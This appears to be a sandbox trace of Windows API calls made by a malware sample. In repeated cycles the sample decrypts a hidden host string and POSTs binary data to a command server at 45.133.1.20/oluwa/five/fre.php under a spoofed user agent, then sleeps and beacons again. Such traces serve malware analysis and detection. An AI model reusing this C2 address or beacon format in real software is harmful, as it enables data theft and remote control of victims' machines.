[0320.890] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0320.891] CryptReleaseContext (hProv=0x6beca0, dwFlags=0x0) returned 1 [0320.891] GetProcessHeap () returned 0x6a0000 [0320.891] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0320.892] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0320.892] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0320.893] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0320.893] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0320.894] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0320.895] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0320.896] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0320.897] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0320.897] GetProcessHeap () returned 0x6a0000 [0320.897] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0320.897] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0320.897] GetProcessHeap () returned 0x6a0000 [0320.898] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0320.898] GetProcessHeap () returned 0x6a0000 [0320.898] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0320.898] GetProcessHeap () returned 0x6a0000 [0320.899] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0320.899] GetProcessHeap () returned 0x6a0000 [0320.899] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0320.900] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0320.900] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0320.907] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0320.908] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bed28) returned 1 [0320.917] GetProcessHeap () returned 0x6a0000 [0320.917] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0320.918] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0320.918] CryptImportKey (in: hProv=0x6bed28, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0320.919] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0320.920] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0320.920] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0320.921] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0320.921] GetProcessHeap () returned 0x6a0000 [0320.922] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0320.923] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0320.923] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0320.924] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0320.924] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0320.925] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0320.926] CryptReleaseContext (hProv=0x6bed28, dwFlags=0x0) returned 1 [0320.926] GetProcessHeap () returned 0x6a0000 [0320.926] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0320.927] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0320.927] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0320.928] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0320.929] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0320.930] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0320.930] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0320.931] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0320.932] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0320.932] GetProcessHeap () returned 0x6a0000 [0320.932] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3490 [0320.932] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0320.932] GetProcessHeap () returned 0x6a0000 [0320.932] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa40 [0320.932] socket (af=2, type=1, protocol=6) returned 0xc70 [0320.932] connect (s=0xc70, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0320.956] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0320.956] GetProcessHeap () returned 0x6a0000 [0320.956] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0320.956] GetProcessHeap () returned 0x6a0000 [0320.956] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dff48 [0320.957] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0320.958] wvsprintfA (in: param_1=0x6dff48, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0320.958] GetProcessHeap () returned 0x6a0000 [0320.959] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6df7a8 [0320.959] GetProcessHeap () returned 0x6a0000 [0320.959] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dff48 | out: hHeap=0x6a0000) returned 1 [0320.959] GetProcessHeap () returned 0x6a0000 [0320.959] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4be0 [0320.959] GetProcessHeap () returned 0x6a0000 [0320.959] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dff48 [0320.960] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0320.961] wvsprintfA (in: param_1=0x6dff48, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0320.961] GetProcessHeap () returned 0x6a0000 [0320.961] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0320.961] GetProcessHeap () returned 0x6a0000 [0320.962] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dff48 | out: hHeap=0x6a0000) returned 1 [0320.962] send (s=0xc70, buf=0x6bd460*, len=242, flags=0) returned 242 [0320.963] send (s=0xc70, buf=0x6bb998*, len=159, flags=0) returned 159 [0320.963] GetProcessHeap () returned 0x6a0000 [0320.963] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6f28 [0320.963] recv (in: s=0xc70, buf=0x6c6f28, len=4048, flags=0 | out: buf=0x6c6f28*) returned 204 [0321.036] GetProcessHeap () returned 0x6a0000 [0321.036] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0321.036] GetProcessHeap () returned 0x6a0000 [0321.037] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0321.037] GetProcessHeap () returned 0x6a0000 [0321.037] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6df7a8 | out: hHeap=0x6a0000) returned 1 [0321.037] GetProcessHeap () returned 0x6a0000 [0321.037] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0321.038] closesocket (s=0xc70) returned 0 [0321.038] GetProcessHeap () returned 0x6a0000 [0321.038] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa40 | out: hHeap=0x6a0000) returned 1 [0321.038] GetProcessHeap () returned 0x6a0000 [0321.039] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0321.039] GetProcessHeap () returned 0x6a0000 [0321.039] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0321.039] GetProcessHeap () returned 0x6a0000 [0321.039] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3490 | out: hHeap=0x6a0000) returned 1 [0321.040] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6f28, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x19d8) returned 0xc70 [0321.042] Sleep (dwMilliseconds=0xea60) [0321.044] GetProcessHeap () returned 0x6a0000 [0321.044] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0321.045] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0321.046] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0321.053] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0321.053] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beca0) returned 1 [0321.064] GetProcessHeap () returned 0x6a0000 [0321.064] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0321.065] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0321.066] CryptImportKey (in: hProv=0x6beca0, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0321.066] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0321.067] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0321.068] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0321.068] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0321.068] GetProcessHeap () returned 0x6a0000 [0321.069] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0321.070] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0321.070] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0321.076] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0321.076] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0321.077] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0321.079] CryptReleaseContext (hProv=0x6beca0, dwFlags=0x0) returned 1 [0321.079] GetProcessHeap () returned 0x6a0000 [0321.079] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0321.080] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0321.081] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0321.082] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0321.082] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0321.083] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0321.084] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0321.084] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0321.085] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0321.085] GetProcessHeap () returned 0x6a0000 [0321.085] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0321.085] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0321.085] GetProcessHeap () returned 0x6a0000 [0321.086] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0321.086] GetProcessHeap () returned 0x6a0000 [0321.086] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0321.086] GetProcessHeap () returned 0x6a0000 [0321.087] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0321.087] GetProcessHeap () returned 0x6a0000 [0321.087] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0321.088] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0321.088] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0321.117] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0321.118] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beb90) returned 1 [0321.126] GetProcessHeap () returned 0x6a0000 [0321.126] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0321.126] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0321.127] CryptImportKey (in: hProv=0x6beb90, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0321.128] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0321.128] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0321.129] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0321.129] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0321.129] GetProcessHeap () returned 0x6a0000 [0321.130] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0321.130] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0321.133] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0321.133] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0321.134] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0321.134] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0321.134] CryptReleaseContext (hProv=0x6beb90, dwFlags=0x0) returned 1 [0321.134] GetProcessHeap () returned 0x6a0000 [0321.135] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0321.135] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0321.135] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0321.136] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0321.136] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0321.137] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0321.137] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0321.138] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0321.139] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0321.139] GetProcessHeap () returned 0x6a0000 [0321.139] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0321.139] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0321.139] GetProcessHeap () returned 0x6a0000 [0321.139] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9e0 [0321.139] socket (af=2, type=1, protocol=6) returned 0xc74 [0321.140] connect (s=0xc74, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0321.163] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0321.163] GetProcessHeap () returned 0x6a0000 [0321.163] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0321.163] GetProcessHeap () returned 0x6a0000 [0321.163] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dff48 [0321.163] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0321.164] wvsprintfA (in: param_1=0x6dff48, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0321.164] GetProcessHeap () returned 0x6a0000 [0321.164] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6df9e8 [0321.164] GetProcessHeap () returned 0x6a0000 [0321.165] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dff48 | out: hHeap=0x6a0000) returned 1 [0321.166] GetProcessHeap () returned 0x6a0000 [0321.166] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0321.166] GetProcessHeap () returned 0x6a0000 [0321.166] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dff48 [0321.168] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0321.170] wvsprintfA (in: param_1=0x6dff48, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0321.170] GetProcessHeap () returned 0x6a0000 [0321.170] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0321.170] GetProcessHeap () returned 0x6a0000 [0321.171] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dff48 | out: hHeap=0x6a0000) returned 1 [0321.171] send (s=0xc74, buf=0x6bd460*, len=242, flags=0) returned 242 [0321.172] send (s=0xc74, buf=0x6bb998*, len=159, flags=0) returned 159 [0321.172] GetProcessHeap () returned 0x6a0000 [0321.172] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6f28 [0321.172] recv (in: s=0xc74, buf=0x6c6f28, len=4048, flags=0 | out: buf=0x6c6f28*) returned 204 [0321.243] GetProcessHeap () returned 0x6a0000 [0321.243] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0321.243] GetProcessHeap () returned 0x6a0000 [0321.243] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0321.243] GetProcessHeap () returned 0x6a0000 [0321.244] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6df9e8 | out: hHeap=0x6a0000) returned 1 [0321.244] GetProcessHeap () returned 0x6a0000 [0321.244] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0321.244] closesocket (s=0xc74) returned 0 [0321.245] GetProcessHeap () returned 0x6a0000 [0321.245] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9e0 | out: hHeap=0x6a0000) returned 1 [0321.245] GetProcessHeap () returned 0x6a0000 [0321.246] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0321.246] GetProcessHeap () returned 0x6a0000 [0321.246] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0321.246] GetProcessHeap () returned 0x6a0000 [0321.246] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0321.247] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6f28, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x19dc) returned 0xc74 [0321.250] Sleep (dwMilliseconds=0xea60) [0321.251] GetProcessHeap () returned 0x6a0000 [0321.251] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4a30 [0321.252] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0321.253] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0321.259] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0321.260] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0321.268] GetProcessHeap () returned 0x6a0000 [0321.268] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0321.269] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0321.270] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad060) returned 1 [0321.270] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0321.271] CryptSetKeyParam (hKey=0x6ad060, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0321.271] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0321.272] CryptSetKeyParam (hKey=0x6ad060, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0321.272] GetProcessHeap () returned 0x6a0000 [0321.272] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0321.274] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0321.274] CryptDecrypt (in: hKey=0x6ad060, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4a30, pdwDataLen=0x19fcfc | out: pbData=0x6b4a30, pdwDataLen=0x19fcfc) returned 1 [0321.275] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0321.276] CryptDestroyKey (hKey=0x6ad060) returned 1 [0321.277] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0321.277] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0321.277] GetProcessHeap () returned 0x6a0000 [0321.277] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0321.284] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0321.284] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0321.285] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0321.285] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0321.286] LoadLibraryW 